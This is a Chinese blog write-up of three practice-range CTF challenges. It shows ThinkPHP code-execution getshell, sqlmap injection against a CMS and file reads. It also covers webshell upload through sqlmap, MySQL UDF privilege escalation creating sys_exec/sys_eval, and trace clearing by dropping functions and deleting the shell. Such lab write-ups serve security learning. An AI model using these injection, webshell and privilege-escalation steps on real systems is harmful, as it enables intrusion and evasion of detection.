【安鸾靶场】实战渗透


前言

最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

一、××租房网 (150分)

http://106.15.50.112:8031/
在这里插入图片描述
刚打开burp就报了thinkphp的代码执行
在这里插入图片描述

直接getshell
在这里插入图片描述
flag:
在这里插入图片描述

二、企业网站 (300分)

http://106.15.50.112:8035/
打开就看到闪灵cms
在这里插入图片描述
开启sqlmapapi:在这里插入图片描述
去用户界面测试:
在这里插入图片描述
这里注册一个验证码直接空就行:
这里有个注入点:

GET /?type=form&S_id=987181647 HTTP/1.1
Host: 106.15.50.112:8035
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: close
Cache-Control: max-age=0

在这里插入图片描述
没跑出来:
在这里插入图片描述
寻找其他注入点:
在这里插入图片描述
那个api跑的慢直接上-r
在这里插入图片描述

在这里插入图片描述
这里有个flag
在这里插入图片描述
sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
在这里插入图片描述

三、SQL注入进阶 (550分)

题目URL:http://106.15.50.112:8023/
提示:flag在服务器根目录

感觉像是sql注入后台上传
在这里插入图片描述
感觉像是伪静态:
在这里插入图片描述
在这里插入图片描述
尝试注入:加*
在这里插入图片描述

在这里插入图片描述
加-dbs参数爆库:
在这里插入图片描述
加–tables爆表:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
找一下后台:
在这里插入图片描述
在这里插入图片描述
这里有upload和images:都可以直接访问
在这里插入图片描述
寻找上传点:
在这里插入图片描述

制作图片马上传:
在这里插入图片描述
尝试修改扩展名:(失败)
在这里插入图片描述
限制了后缀
寻找其他点:
在这里插入图片描述
这里又来sql注入加上刚找的就3个注入点了
使用sqlmap获取一下shell
在这里插入图片描述
直接暴力跑路径:
在这里插入图片描述
失败(应该是不是默认的路径)
读取一下apache的配置找找路径:可能存在的路径
/etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
/etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
/usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
/etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

这里是这个路径直接读取:

sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"

在这里插入图片描述
在这里插入图片描述
直接–os-shell(目录权限不够)
在这里插入图片描述
用upload试试:(权限不够)在这里插入图片描述
试试其他的目录:

在这里插入图片描述
最后images有权限:
在这里插入图片描述

cat看不到,可能是权限问题:
在这里插入图片描述
在这里插入图片描述
可以通过sqlmap上传自己的shell:
sqlmap 会上传自己的马:
在这里插入图片描述

在这里插入图片描述
选择我们的马上传:
在这里插入图片描述
蚁剑上线:
在这里插入图片描述
这里查看flag发现权限不够:
在这里插入图片描述
这是mysql权限:
尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
这里的密码为空:
在这里插入图片描述

查看可导出文件位置

show variables like '%secure%';
这个mysql>5.1版本

这的secure_file_priv为空可以提权
在这里插入图片描述

show variables like 'plugin%'

在这里插入图片描述
在kali中生成so文件上传到plugin目录
在这里插入图片描述

在这里插入图片描述

添加sys_exec和sys_eval函数

create function sys_exec returns string soname 'mysqludf3.so'
create function sys_eval returns string soname 'mysqludf3.so'

在这里插入图片描述

在这里插入图片描述

清除痕迹:
drop function sys_eval;
drop function sys_exec;
在这里插入图片描述
在这里插入图片描述
删除shell:
在这里插入图片描述
可以自己试试。

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值